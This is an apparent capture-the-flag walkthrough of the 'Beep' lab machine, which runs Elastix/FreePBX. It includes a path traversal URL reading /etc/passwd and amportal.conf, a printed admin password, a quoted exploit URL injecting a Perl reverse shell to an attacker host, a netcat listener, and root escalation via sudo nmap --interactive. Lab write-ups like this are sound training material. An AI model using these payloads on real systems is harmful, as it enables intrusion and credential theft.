We pick Beep from the list:

Foothold

We can start with our usual nmap scan:

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 15:50 EDT
Nmap scan report for 10.10.10.7
Host is up (0.12s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE EXPIRE(NEVER) STLS TOP PIPELINING USER UIDL RESP-CODES LOGIN-DELAY(0)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            877/udp  status
|_  100024  1            880/tcp  status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed UNSELECT OK IMAP4rev1 UIDPLUS URLAUTHA0001 LISTEXT RENAME X-NETSCAPE LIST-SUBSCRIBED ACL MULTIAPPEND IMAP4 SORT=MODSEQ RIGHTS=kxte IDLE CONDSTORE NAMESPACE CATENATE NO STARTTLS ANNOTATEMORE QUOTA LITERAL+ THREAD=REFERENCES MAILBOX-REFERRALS THREAD=ORDEREDSUBJECT ATOMIC ID CHILDREN SORT BINARY
443/tcp   open  ssl/https?
|_ssl-date: 2019-08-24T20:00:08+00:00; -42s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/24%OT=22%CT=1%CU=42833%PV=Y%DS=2%DC=T%G=Y%TM=5D61982
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=D2%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: mean: -42s, deviation: 0s, median: -42s

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   126.95 ms 10.10.14.1
2   114.02 ms 10.10.10.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 827.45 seconds

There’s a lot going on with this one. I am guessing we want to start with some of the mail settings.

Let’s check out the web ports on 80, 443 and 1000.

Open a browser and navigate to the default: http://10.10.10.7/.

We get auto redirected to https:

After confirming the self-signed certificate exception, we get prompt with a login screen:

If we don’t know what it is, a quick search will find it’s a PBX UC platform for Linux.

There are also some vulnerabilities:

https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=elastix&search_type=all

But let’s do a search:

searchsploit elastix

We know some exist but we aren’t 100% sure which version it is running.

We try gobuster, using dir -k -u <url> to set the URL and to ignore SSL warnings. Then we set the word list that dirbuster uses.

gobuster dir -k -u https://10.10.10.7/ -w /usr/share/wordlists/dirb/common.txt

Output

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/24 21:07:24 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/cgi-bin/ (Status: 403)
/configs (Status: 301)
/favicon.ico (Status: 200)
/help (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/lang (Status: 301)
/libs (Status: 301)
/mail (Status: 301)
/modules (Status: 301)
/panel (Status: 301)
/robots.txt (Status: 200)
/static (Status: 301)
/themes (Status: 301)
/var (Status: 301)
===============================================================
2019/09/24 21:15:23 Finished
===============================================================

Let’s check out https://10.10.10.7/robots.txt:

User-agent: *
Disallow: /

From the 301 codes I am going to take a guess that the permanent redirect refers to http to https. So let’s check out from the top:

The /admin requires a login:

A failed attempt gives us an unauthorized error but another hint – the version of FreePBX:

The FreePBX default credentials are admin:admin however, those did not work.

We can see configs/:

We also see /mail:

Looks like it’s Roundcube, an IMAP Web mail connector.

After looking around we go back to the Elastix part. The files timestamps seem to indicate creation on November 01, 2011.

From this link it looks like it could be version 2.2:   https://distrowatch.com/index.php?distribution=elastix

This means we may find a search script that will work:

searchsploit -x 37637

It’s a perl script that looks like it does a local path traversal exploit.

This is the part we care about:

Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

From looking at the code we test that we can hit the main exploit page, vTigerCRM:

And it does exist, so this exploit may work.

User

Before sending the payload, I want to try getting the user flag just from the path traversal export:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

We get a user: fanis. Let’s go right for the flag:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action

Now, moving on back to the default exploit:

Alright, we get some passwords so let’s try admin:jEhdIekWmdjE:

Great.

From there we take a look around. Finally, I see the user, fanis, has an extension created:

With this, we can run our exploit:

From our searches, we find one that requires an extension:

searchsploit -x 18650

This is the main part we care about:

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

You can update and just pass the variable string or update and run the script.

We setup our reverse listener locally:

nc -lvp 443

Then run the payload.

Privilege Escalation

This exploit is chained in that it allows asterisk user to run nmap. Because of that we can run it as a privileged user then exit but keep the elevated shell.

Run nmap in interactive mode:

sudo nmap --interactive

Once connected, we exit mode, causing it to become a root shell:

!sh

We then can get the root flag:

cat /root/root.txt